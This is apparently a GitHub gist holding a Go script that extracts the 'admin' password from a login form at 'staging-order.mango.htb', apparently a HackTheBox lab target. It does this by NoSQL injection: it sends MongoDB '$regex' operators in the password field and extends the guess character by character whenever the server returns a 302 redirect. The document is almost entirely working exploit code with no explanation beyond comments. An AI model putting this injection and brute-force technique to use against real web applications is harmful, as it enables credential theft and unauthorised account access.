Bruteforce MongoDB Credentials with Regex Match Payload
package main | |
import ( | |
"fmt" | |
"net/http" | |
"net/url" | |
"strings" | |
) | |
// Build a rune slice of printable ASCII characters, excluding some special characters that would break the regex | |
func buildPrintable() []rune { | |
var p []rune | |
for i := '0'; i <= '9'; i++ { | |
p = append(p, i) | |
} | |
for i := 'A'; i <= 'Z'; i++ { | |
p = append(p, i) | |
} | |
for i := 'a'; i <= 'z'; i++ { | |
p = append(p, i) | |
} | |
special := "~>][<>!@#%^()@_{}" | |
for _, c := range special { | |
p = append(p, c) | |
} | |
return p | |
} | |
// Post form data with URL-encoded payload | |
func makePostRequest(data string) int { | |
u := "http://staging-order.mango.htb" | |
req, err := http.NewRequest("POST", u, strings.NewReader(data)) | |
req.Header.Set("Content-Type", "application/x-www-form-urlencoded") | |
client := &http.Client{ | |
// Prevent redirects | |
CheckRedirect: func(req *http.Request, via []*http.Request) error { | |
return http.ErrUseLastResponse | |
}, | |
} | |
resp, err := client.Do(req) | |
if err != nil { | |
panic(err) | |
} | |
defer resp.Body.Close() | |
return resp.StatusCode | |
} | |
func buildPostData(victim, payload string) string { | |
data := url.Values{} | |
data.Set("username", victim) | |
data.Set("password[$regex]", payload+".*") | |
return data.Encode() | |
} | |
func main() { | |
printable := buildPrintable() | |
victim := "admin" | |
fmt.Printf("[*] Bruteforcing password for: %s\n", victim) | |
for _, a := range printable { | |
flag := string(a) | |
restart := true | |
for restart { | |
restart = false | |
for _, c := range printable { | |
payload := flag + string(c) | |
data := buildPostData(victim, payload) | |
statusCode := makePostRequest(data) | |
if statusCode == 302 { | |
fmt.Println(payload) | |
flag = payload | |
restart = true | |
} | |
} | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment